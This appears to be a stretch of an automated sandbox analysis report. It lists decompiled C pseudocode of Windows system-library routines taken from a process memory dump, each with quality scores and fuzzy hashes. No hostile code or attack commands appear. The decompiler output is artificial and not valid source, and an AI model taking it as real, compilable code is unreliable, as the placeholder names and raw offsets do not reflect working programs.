                                                                                                                                    • Opcode Fuzzy Hash: b663c1996ee065c985d21b508a21b5076a93f4d9708f9a4a4d15cc1e81dd48fe
                                                                                                                                    • Instruction Fuzzy Hash: 74017B315883094FDB52DE68AC465F6B3E2CEA2754B442AAACC459B161D229D057C7C1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E04BF14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				short _v54;
                                                                                                                                    				char _v60;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char* _t21;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    				intOrPtr _t34;
                                                                                                                                    				signed int _t35;
                                                                                                                                    
                                                                                                                                    				_t32 = __edx;
                                                                                                                                    				_t27 = __ebx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t35;
                                                                                                                                    				_t33 = __edx;
                                                                                                                                    				_t34 = __ecx;
                                                                                                                                    				E04B7FA60( &_v60, 0, 0x30);
                                                                                                                                    				_v20 = _a4;
                                                                                                                                    				_v16 = _a8;
                                                                                                                                    				_v28 = _t34;
                                                                                                                                    				_v24 = _t33;
                                                                                                                                    				_v54 = 0x1034;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t21 = 0x7ffe0388;
                                                                                                                                    				} else {
                                                                                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v60);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t21 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                    			}

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c424b12224b971183222654c1cdfdbbb231f88b9ed568839f32f57a134e2aa6e
                                                                                                                                    • Instruction ID: da969faaa56468254024fa8f533ee6f58e9488241895d396c53fc987bd4bd79b
                                                                                                                                    • Opcode Fuzzy Hash: c424b12224b971183222654c1cdfdbbb231f88b9ed568839f32f57a134e2aa6e
                                                                                                                                    • Instruction Fuzzy Hash: 76019271A01248AFDB14DFA8D841FAEB7B8EF44714F0040A6F915EB280DA74EE01CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                    			E04BF138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				short _v54;
                                                                                                                                    				char _v60;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char* _t21;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    				intOrPtr _t34;
                                                                                                                                    				signed int _t35;
                                                                                                                                    
                                                                                                                                    				_t32 = __edx;
                                                                                                                                    				_t27 = __ebx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t35;
                                                                                                                                    				_t33 = __edx;
                                                                                                                                    				_t34 = __ecx;
                                                                                                                                    				E04B7FA60( &_v60, 0, 0x30);
                                                                                                                                    				_v20 = _a4;
                                                                                                                                    				_v16 = _a8;
                                                                                                                                    				_v28 = _t34;
                                                                                                                                    				_v24 = _t33;
                                                                                                                                    				_v54 = 0x1033;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t21 = 0x7ffe0388;
                                                                                                                                    				} else {
                                                                                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v60);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t21 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                    			}

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B4B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                                                                                                    				signed char _t11;
                                                                                                                                    				signed char* _t12;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				signed short* _t25;
                                                                                                                                    
                                                                                                                                    				_t25 = __edx;
                                                                                                                                    				_t24 = __ecx;
                                                                                                                                    				_t11 = ( *[fs:0x30])[0x50];
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					if( *_t11 == 0) {
                                                                                                                                    						goto L1;
                                                                                                                                    					}
                                                                                                                                    					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                                    					L2:
                                                                                                                                    					if( *_t12 != 0) {
                                                                                                                                    						_t12 =  *[fs:0x30];
                                                                                                                                    						if((_t12[0x240] & 0x00000004) == 0) {
                                                                                                                                    							goto L3;
                                                                                                                                    						}
                                                                                                                                    						if(E04B57D50() == 0) {
                                                                                                                                    							_t12 = 0x7ffe0385;
                                                                                                                                    						} else {
                                                                                                                                    							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                                    						}
                                                                                                                                    						if(( *_t12 & 0x00000020) == 0) {
                                                                                                                                    							goto L3;
                                                                                                                                    						}
                                                                                                                                    						return E04BB7016(_a4, _t24, 0, 0, _t25, 0);
                                                                                                                                    					}
                                                                                                                                    					L3:
                                                                                                                                    					return _t12;
                                                                                                                                    				}
                                                                                                                                    				L1:
                                                                                                                                    				_t12 = 0x7ffe0384;
                                                                                                                                    				goto L2;
                                                                                                                                    			}

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04C01074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                                                                    				char _v8;
                                                                                                                                    				void* _v11;
                                                                                                                                    				unsigned int _v12;
                                                                                                                                    				void* _v15;
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				char* _t16;
                                                                                                                                    				signed int* _t35;
                                                                                                                                    
                                                                                                                                    				_t22 = __ebx;
                                                                                                                                    				_t35 = __ecx;
                                                                                                                                    				_v8 = __edx;
                                                                                                                                    				_t13 =  !( *__ecx) + 1;
                                                                                                                                    				_v12 =  !( *__ecx) + 1;
                                                                                                                                    				if(_a4 != 0) {
                                                                                                                                    					E04C0165E(__ebx, 0x4c28ae4, (__edx -  *0x4c28b04 >> 0x14) + (__edx -  *0x4c28b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c28b04 >> 0x14) + (__edx -  *0x4c28b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                                                                    				}
                                                                                                                                    				E04BFAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t16 = 0x7ffe0388;
                                                                                                                                    				} else {
                                                                                                                                    					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    				}
                                                                                                                                    				if( *_t16 != 0) {
                                                                                                                                    					_t16 = E04BEFE3F(_t22, _t35, _v8, _v12);
                                                                                                                                    				}
                                                                                                                                    				return _t16;
                                                                                                                                    			}

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E04BEFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				short _v58;
                                                                                                                                    				char _v64;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char* _t18;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				intOrPtr _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_t24 = __ebx;
                                                                                                                                    				_v12 =  *0x4c2d360 ^ _t32;
                                                                                                                                    				_t30 = __edx;
                                                                                                                                    				_t31 = __ecx;
                                                                                                                                    				E04B7FA60( &_v64, 0, 0x30);
                                                                                                                                    				_v24 = _a4;
                                                                                                                                    				_v32 = _t31;
                                                                                                                                    				_v28 = _t30;
                                                                                                                                    				_v58 = 0x266;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t18 = 0x7ffe0388;
                                                                                                                                    				} else {
                                                                                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v64);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t18 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                                                    			}

















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E04BEFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				short _v58;
                                                                                                                                    				char _v64;
                                                                                                                                    				void* __edi;
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char* _t18;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				intOrPtr _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_t24 = __ebx;
                                                                                                                                    				_v12 =  *0x4c2d360 ^ _t32;
                                                                                                                                    				_t30 = __edx;
                                                                                                                                    				_t31 = __ecx;
                                                                                                                                    				E04B7FA60( &_v64, 0, 0x30);
                                                                                                                                    				_v24 = _a4;
                                                                                                                                    				_v32 = _t31;
                                                                                                                                    				_v28 = _t30;
                                                                                                                                    				_v58 = 0x267;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t18 = 0x7ffe0388;
                                                                                                                                    				} else {
                                                                                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v64);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t18 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                                                                                                    			}

















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                    			E04C08ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				short _v62;
                                                                                                                                    				char _v68;
                                                                                                                                    				signed char* _t29;
                                                                                                                                    				intOrPtr _t35;
                                                                                                                                    				intOrPtr _t41;
                                                                                                                                    				intOrPtr _t42;
                                                                                                                                    				signed int _t43;
                                                                                                                                    
                                                                                                                                    				_t40 = __edx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t43;
                                                                                                                                    				_v28 = __ecx;
                                                                                                                                    				_v62 = 0x1c2a;
                                                                                                                                    				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                                                                                                    				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                                                                                                    				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                                                                                                    				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                                                                                                    				_v24 = __edx;
                                                                                                                                    				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t29 = 0x7ffe0386;
                                                                                                                                    				} else {
                                                                                                                                    					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v68);
                                                                                                                                    				_push(0x1c);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t29 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                                                                                                    			}



















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B3B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                                                                                                    				signed char* _t13;
                                                                                                                                    				intOrPtr _t22;
                                                                                                                                    				char _t23;
                                                                                                                                    
                                                                                                                                    				_t23 = __edx;
                                                                                                                                    				_t22 = __ecx;
                                                                                                                                    				if(E04B57D50() != 0) {
                                                                                                                                    					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                                                                                    				} else {
                                                                                                                                    					_t13 = 0x7ffe0384;
                                                                                                                                    				}
                                                                                                                                    				if( *_t13 != 0) {
                                                                                                                                    					_t13 =  *[fs:0x30];
                                                                                                                                    					if((_t13[0x240] & 0x00000004) == 0) {
                                                                                                                                    						goto L3;
                                                                                                                                    					}
                                                                                                                                    					if(E04B57D50() == 0) {
                                                                                                                                    						_t13 = 0x7ffe0385;
                                                                                                                                    					} else {
                                                                                                                                    						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                                    					}
                                                                                                                                    					if(( *_t13 & 0x00000020) == 0) {
                                                                                                                                    						goto L3;
                                                                                                                                    					}
                                                                                                                                    					return E04BB7016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                                                                                                    				} else {
                                                                                                                                    					L3:
                                                                                                                                    					return _t13;
                                                                                                                                    				}
                                                                                                                                    			}







Memory Dump Source
• Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
• Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
• Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                    			E04BCFE87(intOrPtr __ecx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				intOrPtr _v28;
                                                                                                                                    				short _v54;
                                                                                                                                    				char _v60;
                                                                                                                                    				signed char* _t21;
                                                                                                                                    				intOrPtr _t27;
                                                                                                                                    				intOrPtr _t32;
                                                                                                                                    				intOrPtr _t33;
                                                                                                                                    				intOrPtr _t34;
                                                                                                                                    				signed int _t35;
                                                                                                                                    
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t35;
                                                                                                                                    				_v16 = __ecx;
                                                                                                                                    				_v54 = 0x1722;
                                                                                                                                    				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                                                                    				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                                                                    				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t21 = 0x7ffe0382;
                                                                                                                                    				} else {
                                                                                                                                    					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v60);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t21 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                    			}

















Memory Dump Source
• Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
• Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
• Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E04BF131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				short _v50;
                                                                                                                                    				char _v56;
                                                                                                                                    				signed char* _t18;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				intOrPtr _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t32;
                                                                                                                                    				_v20 = _a4;
                                                                                                                                    				_v12 = _a8;
                                                                                                                                    				_v24 = __ecx;
                                                                                                                                    				_v16 = __edx;
                                                                                                                                    				_v50 = 0x1021;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t18 = 0x7ffe0380;
                                                                                                                                    				} else {
                                                                                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v56);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x20402);
                                                                                                                                    				_push( *_t18 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                                    			}
















Memory Dump Source
• Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
• Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
• Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                    			E04C08F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				intOrPtr _v16;
                                                                                                                                    				intOrPtr _v20;
                                                                                                                                    				intOrPtr _v24;
                                                                                                                                    				short _v50;
                                                                                                                                    				char _v56;
                                                                                                                                    				signed char* _t18;
                                                                                                                                    				intOrPtr _t24;
                                                                                                                                    				intOrPtr _t30;
                                                                                                                                    				intOrPtr _t31;
                                                                                                                                    				signed int _t32;
                                                                                                                                    
                                                                                                                                    				_t29 = __edx;
                                                                                                                                    				_v8 =  *0x4c2d360 ^ _t32;
                                                                                                                                    				_v16 = __ecx;
                                                                                                                                    				_v50 = 0x1c2c;
                                                                                                                                    				_v24 = _a4;
                                                                                                                                    				_v20 = _a8;
                                                                                                                                    				_v12 = __edx;
                                                                                                                                    				if(E04B57D50() == 0) {
                                                                                                                                    					_t18 = 0x7ffe0386;
                                                                                                                                    				} else {
                                                                                                                                    					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                                                    				}
                                                                                                                                    				_push( &_v56);
                                                                                                                                    				_push(0x10);
                                                                                                                                    				_push(0x402);
                                                                                                                                    				_push( *_t18 & 0x000000ff);
                                                                                                                                    				return E04B7B640(E04B79AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                                                    			}
















                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d10645bd3be309f7072985c19b78eb53adbba4586a1ca203016729488d672eb
                                                                                                                                    • Instruction ID: db9d0f473958847b3f2a0b1e1489873481f603ea03a5a837d1c86671a2d96a6c
                                                                                                                                    • Opcode Fuzzy Hash: 7d10645bd3be309f7072985c19b78eb53adbba4586a1ca203016729488d672eb
                                                                                                                                    • Instruction Fuzzy Hash: 15014474A0120CAFDB04EFB8D545AAEB7F4EF08704F108099F915EB380EA74EA00DB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E04B5C577(void* __ecx, char _a4) {
                                                                                                                                    				void* __esi;
                                                                                                                                    				void* __ebp;
                                                                                                                                    				void* _t17;
                                                                                                                                    				void* _t19;
                                                                                                                                    				void* _t20;
                                                                                                                                    				void* _t21;
                                                                                                                                    
                                                                                                                                    				_t18 = __ecx;
                                                                                                                                    				_t21 = __ecx;
                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04B5C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4b111cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                                                    					__eflags = _a4;
                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                    						L10:
                                                                                                                                    						E04C088F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                                                    						L9:
                                                                                                                                    						return 0;
                                                                                                                                    					}
                                                                                                                                    					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                    						goto L10;
                                                                                                                                    					}
                                                                                                                                    					goto L9;
                                                                                                                                    				} else {
                                                                                                                                    					return 1;
                                                                                                                                    				}
                                                                                                                                    			}










                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 47fbe90f27d2383aaac4cf3fe448ddb71a63cc1217a2c87ca16d94da8d215c5c
                                                                                                                                    • Instruction ID: 1a0ff9109d5ee32516ccc466f25f898ddff0a939b262c98d845f77f773e436bf
                                                                                                                                    • Opcode Fuzzy Hash: 47fbe90f27d2383aaac4cf3fe448ddb71a63cc1217a2c87ca16d94da8d215c5c
                                                                                                                                    • Instruction Fuzzy Hash: AAF090B29157909EE7319B98A005B22FFF6DB05778F4484E6DE0687172C7A4F880C351
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                    			E04BF2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                                                    				void* __esi;
                                                                                                                                    				signed char _t3;
                                                                                                                                    				signed char _t7;
                                                                                                                                    				void* _t19;
                                                                                                                                    
                                                                                                                                    				_t17 = __ecx;
                                                                                                                                    				_t3 = E04BEFD22(__ecx);
                                                                                                                                    				_t19 =  *0x4c2849c - _t3; // 0x57ff1730
                                                                                                                                    				if(_t19 == 0) {
                                                                                                                                    					__eflags = _t17 -  *0x4c28748; // 0x0
                                                                                                                                    					if(__eflags <= 0) {
                                                                                                                                    						E04BF1C06();
                                                                                                                                    						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                                                                    						__eflags = _t3;
                                                                                                                                    						if(_t3 != 0) {
                                                                                                                                    							L5:
                                                                                                                                    							__eflags =  *0x4c28724 & 0x00000004;
                                                                                                                                    							if(( *0x4c28724 & 0x00000004) == 0) {
                                                                                                                                    								asm("int3");
                                                                                                                                    								return _t3;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                                                                    							__eflags = _t3 - 3;
                                                                                                                                    							if(_t3 == 3) {
                                                                                                                                    								goto L5;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t3;
                                                                                                                                    				} else {
                                                                                                                                    					_t7 =  *0x4c28724; // 0x0
                                                                                                                                    					return E04BE8DF1(__ebx, 0xc0000374, 0x4c25890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                                                                    				}
                                                                                                                                    			}








                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d60ee447beeeb3cdeee179914cf287c1443fc4ce697941a687d83eb4f85e39e
                                                                                                                                    • Instruction ID: 980b5cd37186daf14b3825ece824b9dff978b722b0c4fa41ee937e31ad59724d
                                                                                                                                    • Opcode Fuzzy Hash: 7d60ee447beeeb3cdeee179914cf287c1443fc4ce697941a687d83eb4f85e39e
                                                                                                                                    • Instruction Fuzzy Hash: BDF0276B4215844BFF3ABF397A003E16B90C785114B4944C5EE9457204C9BFAC87DB20
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                    			E04C08D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				intOrPtr _v12;
